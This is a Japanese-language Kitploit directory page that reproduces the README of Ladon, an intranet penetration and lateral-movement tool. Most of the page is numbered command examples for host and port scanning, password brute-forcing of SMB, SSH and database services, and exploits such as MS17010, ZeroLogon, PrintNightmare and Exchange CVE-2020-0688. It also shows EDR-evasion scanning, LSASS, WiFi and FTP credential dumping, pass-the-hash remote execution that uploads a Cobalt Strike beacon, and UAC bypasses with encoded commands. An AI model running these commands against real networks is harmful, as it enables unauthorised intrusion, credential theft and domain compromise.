Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Ladon — Ladonは大規模イントラネット侵入スキャナです。PowerShell、Cobalt Strikeプラグイン、メモリロード、ファイルレススキャンに対応。ポートスキャン、サービス識別、ネットワーク資産探索、パスワード監査、高危険度の脆弱性検出、脆弱性悪用、パスワード読み取り、ワンクリックGetShellを含み、Aセグメント/Bセグメント/Cセグメントのバッチスキャンおよびクロスセグメントスキャン、URL・ホスト・ドメインリストスキャンなどをサポートします。ネットワーク資産探索では、32種類のプロトコル(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)または手法により、ターゲットネットワーク内の生存ホストのIP、コンピュータ名、ワークグループ、共有リソース、NICアドレス、OSバージョン、Webサイト、サブドメイン、ミドルウェア、開放サービス、ルーター、スイッチ、データベース、プリンターなどを迅速に取得します。MS17010、Zimbra、Exchangeなどの多数の高危険度脆弱性検出モジュールを搭載。 | Kitploit
ツール/GitHubGitHub/k8gege/ladon
特権昇格偵察脆弱性スキャナーネットワークマッピングパスワード攻撃ポートスキャンエクスプロイト横移動情報収集ウェブセキュリティペネトレーションテストサブドメイン列挙
5.3k882181年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →

概要

Ladonは大規模イントラネット侵入スキャナです。PowerShell、Cobalt Strikeプラグイン、メモリロード、ファイルレススキャンに対応。ポートスキャン、サービス識別、ネットワーク資産探索、パスワード監査、高危険度の脆弱性検出、脆弱性悪用、パスワード読み取り、ワンクリックGetShellを含み、Aセグメント/Bセグメント/Cセグメントのバッチスキャンおよびクロスセグメントスキャン、URL・ホスト・ドメインリストスキャンなどをサポートします。ネットワーク資産探索では、32種類のプロトコル(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)または手法により、ターゲットネットワーク内の生存ホストのIP、コンピュータ名、ワークグループ、共有リソース、NICアドレス、OSバージョン、Webサイト、サブドメイン、ミドルウェア、開放サービス、ルーター、スイッチ、データベース、プリンターなどを迅速に取得します。MS17010、Zimbra、Exchangeなどの多数の高危険度脆弱性検出モジュールを搭載。

GitHubk8gege/ladon

Ladon

リポジトリを見るウェブサイト
共有

Ladon 大規模イントラネット侵入スキャナー Cobalt Strikeプラグインメモリロード

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

プログラム概要

Ladonは大規模イントラネット侵入スキャナー\ドメイン侵入\横移動ツールであり、PowerShellモジュール、Cobalt Strikeプラグイン、メモリロード、ファイルレススキャンをサポートしています。ポートスキャン、サービス識別、ネットワーク資産探索、パスワード監査、高リスク脆弱性の検出、脆弱性の悪用、パスワード読み取り、ワンクリックGetShellを内蔵し、A/B/Cセグメントの一括スキャンやクロスネットワークセグメントスキャンに対応し、URL、ホスト、ドメインリストのスキャンなどをサポートします。12.2バージョンには262の機能モジュールが内蔵されており、ネットワーク資産探索モジュールは30以上のプロトコル(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)を備え、ターゲットネットワークの生存ホストIP、コンピュータ名、ワークグループ、共有リソース、ネットワークカードアドレス、OSバージョン、Webサイト、サブドメイン、ミドルウェア、公開サービス、ルーター、スイッチ、データベース、プリンターなどの情報を迅速に取得する方法を提供します。高リスク脆弱性の検出は16以上で、Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2シリーズ、Printerなどを含みます。パスワード監査は25以上で、データベース(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rarなどを含みます。リモートコマンド実行には(smbexec/wmiexe/psexec/atexec/sshexec/webshell)が含まれます。Webフィンガープリント識別モジュールは135以上(Webアプリケーション、ミドルウェア、スクリプトタイプ、ページタイプ)を識別できます。ローカル権限昇格は21以上で、SweetPotato\BadPotato\EfsPotato\BypassUACを含みます。高度にカスタマイズ可能なプラグインPOCは、.NETアセンブリ、DLL(C#/Delphi/VC)、PowerShellなどの言語で書かれたプラグインをサポートし、INI設定を介して任意の外部プログラムやコマンドを一括呼び出しできます。EXPジェネレーターはワンクリックで脆弱性POC/EXPを生成でき、スキャン機能を迅速に拡張できます。LadonはCobalt Strikeのプラグイン化されたメモリロードをサポートし、ファイルレススキャンでイントラネットを迅速に横移動できます。

Ladonダウンロード```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### シンプルな使い方

Ladonは機能が豊富で多様ですが、使い方は非常に簡単で、誰でもすぐに扱えます<br>
1つまたは2つのパラメータだけで90%の機能を使用でき、1つのモジュールが1つの新しいツールに相当します

### 実行環境

#### Windows

Ladonは.net 2.0以上のバージョンがインストールされたWindowsシステムで使用できます(Win7以降のシステムには.netが標準搭載)<br>
例:Cmd、PowerShell、遠隔操作Cmd、WebShellなど、およびCobalt Strikeでのメモリロード使用<br>
Ladon.ps1はWin7-Win11/2025のPowerShellと完全互換で、バージョンを問わずリモートロードによるファイルレス侵入が可能

#### 全プラットフォームのLadonGoがLinux、Mac、Arm、MIPSに対応
全プラットフォーム:Linux、MacOS、Windows、ルーター、ネットワーク機器などのOSシステム<br>
https://github.com/k8gege/LadonGo

### 厄介な条件

実戦はそれほど順調ではありません。一部の内部ネットワークは転送後に非常に遅くなったり、転送できなくなったりするため、ツールをターゲットにアップロードするしかありません<br>
一部の木馬では2〜3MBのプログラムをアップロードするだけでも半日かかるか、そもそもアップロードできないこともあります。PY(Python)の数十MBはなおさら無理です<br>
LadonはC#で開発されており、プログラムサイズは500KB前後と非常に小さいため、木馬が使えなくても500KBのプログラムならアップロードできるでしょう<br>
それでもダメならPowerShellによるリモートメモリロードも可能です。この点はPYやGOでコンパイルされた大型プログラムでは比較になりません

### 趣旨

ワンストップサービスとして、ユーザーにシンプルで使いやすく、機能が豊富で、柔軟性の高いスキャンツールを提供します

### 特徴

スキャントラフィックが少ない<br>
プログラムサイズが小さい<br>
機能が豊富で強力<br>
プログラムがシンプルで使いやすい<br>
プラグインが複数言語に対応<br>
クロスプラットフォーム(Win/Kali/Ubuntu)など<br>
Cobalt Strikeのプラグイン化に対応<br>
PowerShellによるファイルレス侵入に対応<br>
ExpジェネレーターでPocをワンクリック生成可能<br>
複数バージョンが様々な環境に対応

### プログラムのパラメータ機能

1  指定IPスキャンをサポート<br>
2  指定ドメイン名スキャンをサポート<br>
3  指定ホスト名スキャンをサポート<br>
4  指定Cセグメントスキャンをサポート(ip/24)<br>
5  指定Bセグメントスキャンをサポート(ip/16)<br>
6  指定Aセグメントスキャンをサポート(ip/8)<br>
7  指定URLスキャンをサポート<br>
8  一括IPスキャンをサポート(ip.txt)<br>
9  一括Cセグメントスキャンをサポート(ip24.txt)<br>
10 一括Cセグメントスキャンをサポート(ipc.txt)<br>
11 一括Bセグメントスキャンをサポート(ip16.txt)<br>
12 一括URLスキャンをサポート(url.txt)<br>
13 一括ドメイン名スキャンをサポート(domain.txt)<br>
14 一括ホスト名スキャンをサポート(host.txt)<br>
15 一括国別セグメントスキャンをサポート(cidr.txt)<br>
16 一括文字列リストをサポート(str.txt)<br>
17 ホストのアカウント/パスワードリストをサポート(check.txt)<br>
18 ユーザー/パスワードリストをサポート(userpass.txt)<br>
19 指定範囲のCセグメントスキャンをサポート<br>
20 引数でカスタムDLLのロードをサポート(C#のみ)<br>
21 引数でカスタムEXEのロードをサポート(C#のみ)<br>
22 引数でカスタムINI設定ファイルのロードをサポート<br>
23 引数でカスタムPowerShellのロードをサポート<br>
24 カスタムプログラムをサポート(システムコマンドまたはサードパーティ製プログラム、つまり任意の言語で開発されたプログラムやスクリプト)<br>
25 プラグイン(C#/Delphi/Golang/Python/VC/PowerShellなど複数言語に対応)<br>
26 Cobalt Strikeに対応(beaconコマンドラインでターゲットの内部ネットワークをスキャン、または踏み台経由で外部ネットワークのターゲットをスキャン)<br>
27 CIDR形式のIPスキャンをサポート(例:100.64.0.0/10、192.168.1.1/20など)<br>
28 INI設定でカスタムプログラムのパスワードブルートフォースをサポート<br>

### 簡潔な使用チュートリアル

Ladon 簡潔な使用チュートリアル 完全版ドキュメント: http://k8gege.org/Ladon <br>
Excelモジュール機能ドキュメント: http://k8gege.org/Ladon/wiki.xlsx <br>
Cmd、Cobalt Strike、PowerShellなどのメモリロードに対応<br>
Windows版: .Net、Cobalt Strike、PowerShell<br>
全システム版:GO(全プラットフォーム)、Python(理論上は全プラットフォーム)<br>
PS: Studyはローカルでの学習・使用に便利です。完全な機能を使用する場合はCMDを使用してください

### BypassEDRスキャン

デフォルトのスキャン速度は非常に速いですが、一部のWAFやEDRは防御が強力です<br>
スレッド数をいくつか設定しても、20分ほどでスキャンできなくなる可能性があります<br>
bypassEDRは人間によるアクセスをシミュレートし、速度検出ポリシーをバイパスします<br>

スキャン速度は遅めなので、速度だけを求める方は使用しないでください<br>```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

密码爆破相关モジュールは現時点ではbypassEDRパラメータをサポートしていません

001 カスタムスレッドスキャン

例:ターゲットの10.1.2セグメントにMS17010の脆弱性が存在するかスキャン
シングルスレッド:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80スレッド:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

高強度の保護下ではスキャンスレッドを低めに設定し、Fはシングルスレッド
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Socks5プロキシスキャン
例:8スレッドを使用して、ターゲット10.1.2セグメントにMS17010の脆弱性が存在するかどうかをスキャンします。<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

詳細:http://k8gege.org/Ladon/proxy.html

PS:プロキシツールはSocks5をサポートしていないため、スキャン時にnopingパラメータを追加する必要があります
Frpでも他の同種のツールでも、最も重要なのはProxifierなどのツールがICMPプロトコルをサポートしていないことです
LadonはデフォルトでICMPを使用して生存ホストを検出してから、対応するモジュールでテストを行うためです
そのため、プロキシ環境ではpingスキャンを無効にする必要があります。システムのpingが使用するのはICMPプロトコルです

003 ネットワークセグメントスキャン/一括スキャン

CIDR形式:/24/16/8だけでなく(すべて)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
アルファベット形式:Cセクション、Bセクション、Aセクションのみ 順番に並べ替え```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004指定IP範囲、ネットワークセグメントスキャン

ICMPプローブで1セグメント50-200の生存ホスト```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### ICMPプローブによる1.30~50.80の生存ホスト```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

TXT形式

004 ICMP一括スキャンによるCセグメント生存ホストリスト```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 ICMPによるBセグメントリスト生存ホストの一括スキャン```Bash
Ladon ip16.txt ICMP
006 ICMP一括スキャンCIDRリスト(例:某国のIP帯)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 ICMPによるドメインの一括死活スキャン```Bash
Ladon domain.txt ICMP
008 ICMP一括スキャンによるマシンの死活確認 ホスト名またはマシン名でプローブ```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS一括識別CMS、Banner、SSL証明書、タイトル、未知のCMS、ルーター、プリンター、ネットワーク機器、カメラなどを識別可能```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 DrayTekルーターのバージョン・脆弱性・弱いパスワードの一括検出```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Base64パスワードの一括復号```Bash
Ladon str.txt DeBase64

資産スキャン、フィンガープリント識別、サービス識別、生存ホスト、ポートスキャン

image

012 ICMPスキャン生存ホスト(最速)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Pingによる生存ホストの検出(システムのPingコマンドを呼び出し、ms、ttlなどの情報を表示)```Bash
Ladon 192.168.1.8/24 Ping

pingコマンドが通って初めて生存とみなす場合は、このコマンドで一括検出できます

014 マルチプロトコルによる生存ホストの検出(IP、マシン名、MAC/ドメイン名、メーカー/システムバージョン)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 マルチプロトコルOS識別(IP、マシン名、OSバージョン、開放サービス)```Bash
Ladon 192.168.1.8/24 OsInfo
016 OXID による複数NICホストの検出```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 DNSによる複数NICホストの検出```Bash
Ladon 192.168.1.8/24 DnsInfo
018 マルチプロトコルによる生存ホストIPスキャン```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 SMB脆弱性MS17010のスキャン (IP、マシン名、脆弱性番号、OSバージョン)```Bash
Ladon 192.168.1.8/24 MS17010
020 SMBGhost脆弱性検出 CVE-2020-0796 (IP、マシン名、脆弱性番号、OSバージョン)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 Web タイトル Banner をスキャン より詳細な情報は WhatCMS モジュールで検出してください```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 CセグメントサイトのURLドメインをスキャン```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 CセグメントのサイトURLドメインのスキャン```Bash
Ladon 192.168.1.8/24 SameWeb
024 サブドメイン、第2レベルドメインのスキャン```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 ドメイン名解決IP、ホスト名解決IP```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 一括ドメイン名解決IP、一括ホスト名解決IP```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 一括ドメイン名・ホスト名解決 結果はIPのみ```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 ドメイン内マシン・IPのDNS照会(条件:ドメイン内、ドメインコントローラのIPを指定)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 ドメイン内のマシン、IPを照会(条件:ドメイン内)
Ladon GetDomainIP

##### 028 Cセグメントのポートスキャン、指定ポートのスキャン```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 CセグメントWEBスキャン及びCMS識別(800+Web指紋識別)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### 030 Cisco デバイスのスキャン```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Mssqlデータベースホストの列挙 (データベースIP、マシン名、SQLバージョン)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 ネットワーク共有リソースの列挙 	(ドメイン、IP、ホスト名\共有パス)```Bash
Ladon EnumShare
033 LDAPサーバーのスキャン(ドメインコントローラの検出)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 FTPサーバーをスキャンしてバージョンを特定```Bash
Ladon 192.168.1.8/24 FtpInfo

ブルートフォース/ネットワーク認証/弱いパスワード/パスワードクラッキング/データベース/Webサイト管理画面/ログイン入口/システムログイン

image パスワードクラッキングの詳細はSSHを参照:http://k8gege.org/Ladon/sshscan.html

035 445ポート SMBパスワードクラッキング(Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 135ポート Wmiパスワードブルートフォース(Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
037 389ポート LDAPサーバー、ADドメインパスワードブルートフォース(Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 5985ポート Winrmパスワード総当たり(Windowns)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 445ポート SMB NTLM HASH総当たり(Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 135ポート Wmi NTLM HASH総当たり(Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 22番ポート SSHパスワードブルートフォース(Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 1433ポート Mssqlデータベースパスワード総当たり```Bash
Ladon 192.168.1.8/24 MssqlScan
043 1521番ポート Oracleデータベースパスワードブルートフォース```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
Oracleデータベースは比較的特殊で、ORCLデータベースだけをブルートフォースすると多くの権限を見逃す<br>
詳細:http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 3306ポート Mysqlデータベースパスワードブルートフォース```Bash
Ladon 192.168.1.8/24 MysqlScan
045 7001ポート Weblogic管理コンソールのパスワード総当たり```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 5900ポート VNCリモートデスクトップのパスワードブルートフォース```Bash
Ladon 192.168.1.8/24 VncScan
047 21ポート Ftpサーバーパスワードブルートフォース```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 8080ポート Tomcat管理画面ログインパスワードの総当たり攻撃```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Webポート 401ベーシック認証パスワード爆破```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 139ポートNetbiosプロトコルWindowsパスワードブルートフォース```Bash
Ladon 192.168.1.8/24 NbtScan
053 5985番ポートWinrmプロトコルWindowsパスワード総当たり```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 ネットワークカメラのパスワードブルートフォース(内蔵デフォルトパスワード)```Bash
Ladon 192.168.1.8/24 DvrScan

脆弱性検出/Poc

image

055 SMB脆弱性検出(CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 SMBGhost脆弱性検出 CVE-2020-0796		911保留```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Weblogic脆弱性検出(CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 PhpStudyバックドア検出(phpstudy 2016/phpstudy 2018)  10.9削除 911維持```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 ActiveMQ脆弱性検出(CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Tomcat脆弱性検出(CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 Struts2脆弱性検出(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc CVE-2020-8515脆弱性検出、Draytekバージョン検出、弱パスワード検出```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
FortiGate CVE-2024-55591 未認証RCE脆弱性検出```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### 脆弱性悪用/Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Weblogic脆弱性悪用(CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Tomcat脆弱性の悪用(CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 Windows 0day 脆弱性向け汎用 DLL インジェクション CMD 実行ジェネレータ (DLL わずか 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 マイクロソフトIE/Office 0day脆弱性```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515リモートコマンド実行EXP```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 ドメイン侵入 ZeroLogon CVE-2020-1472ドメインコントローラ権限昇格(パスワード空設定)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 Exchangeシリアル化脆弱性(.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExecループ脆弱性の悪用(Win10永恒之黑CVE-2020-0796、成功時に終了して対象のブルースクリーンを回避)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### ファイルのダウンロード、ファイル転送

##### 071 イントラネットファイル転送 HTTPダウンロード HTTPSダウンロード MSFダウンロード```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 イントラネットファイル転送 Ftpダウンロード```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### 暗号化・復号化(HEX/Base64)

##### 073 Hex暗号化・復号化```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Base64暗号化/復号化```Bash

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### ネットワークスニッフィング

##### 075 Ftpパスワードスニッフィング(本機IPにバインドし、Cセグメントを自動スニッフィング)
マルチNICマシンの場合、対応するCセグメントのIPをスニッフィングする```Bash
Ladon FtpSniffer 192.168.1.5
076 HTTPパスワードスニッフィング(本機IPにバインド、Cセグメントを自動スニッフィング)

マルチNICマシンで、対応するCセグメントのIPをスニッフィングする```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 ネットワークスニッフィング```Bash
Ladon Sniffer

パスワード読み取り

078 IISサイトのパスワード、Webサイトのパスを読み取る```Bash

Ladon IISpwd

root@kitploit:~
##### 079 接続済みWIFIパスワードを読み取る```Bash
Ladon WifiPwd
080 FileZilla FTPパスワードの読み取り```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 システムHash、VPNパスワード、DPAPI-Keyの読み取り  10.9で削除```Bash
Ladon CVE-2021-36934  
082 DumpLsassメモリ内パスワード(mimikatz平文) 9.1.1以前のバージョン限定```Bash

Ladon DumpLsass

root@kitploit:~
### 情報収集

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API現在のユーザーを表示```Bash
Ladon w
Ladon whoami
083 自機の内部IPと外部IPを取得```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 PCname GUID CPUID DiskID Macアドレスの取得```Bash
Ladon GetID
085 ユーザーの最近アクセスしたファイルを表示```Bash

Ladon Recent

root@kitploit:~
##### 086 USBメモリ、USB使用記録の確認(USB名称、USBラベル、パス情報)```Bash
Ladon UsbLog
087 バックドアの検出(レジストリの起動項目、DLLハイジャック)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 プロセス詳細情報(プログラムパス、ビット数、起動引数、ユーザー)```Bash
Ladon EnumProcess
Ladon Tasklist
089 コマンドライン引数を取得```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 ペネトレーションテストの基本情報を取得```Bash
Ladon GetInfo
Ladon GetInfo2
091 .NET & PowerShellバージョン```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 ランタイムバージョン&コンパイル環境```Bash
Ladon Ver
Ladon Version
093 実行時バージョン&コンパイル環境&インストール済みソフトウェア一覧```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 IEプロキシ情報の表示```Bash
Ladon QueryProxy
095 DirListディレクトリ一覧+基本侵入情報
デフォルトで全ドライブを一覧表示
```Bash

Ladon DirList

root@kitploit:~
###### ドライブ文字またはディレクトリを指定```Bash
Ladon DirList c:\   
096 QueryAdmin管理者ユーザーを表示```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 本機の名前付きパイプを表示```Bash
Ladon GetPipe
098 RdpLog3389接続記録の表示```Bash

Ladon RdpLog

root@kitploit:~
### リモート実行(psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### 099 445番ポート 暗号化PSEXECリモートコマンド実行(対話式)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
100 135ポート WmiExecリモートコマンド実行 (非対話式)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 101 445ポート AtExecリモートコマンド実行(非対話式)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 22番ポート SshExecリモートコマンド実行(非対話式)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 JspShellリモートコマンド実行(非対話型)9.3.0で削除
Usage:Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShellリモートコマンド実行(非対話式)9.3.0で削除```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### 105 135ポート WmiExec2リモートコマンド実行HASHサポート(非対話式)ファイルアップロードサポート```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 445ポート SmbExec Ntlm-Hash非対話式リモートコマンド実行(出力なし)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExecリモートコマンド実行・エコーなし(System権限サポート)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

権限昇格と降格

image

108 whoamiで現在のユーザー権限および特権を確認```Bash

Ladon whoami

root@kitploit:~
##### 109  6種のホワイトリストBypassUAC(8.0以降)Win7-Win10  10.8バージョンで削除 911のみ保留
用法: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 UACバイパス実行、Win7-Win10をサポート 10.8版で削除 911のみ保持```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)プリンターの脆弱性を悪用した権限昇格EXP```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFoolプリンター脆弱性権限昇格EXP```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem System権限へ昇格してCMDを実行```Bash
Ladon GetSystem cmd.exe
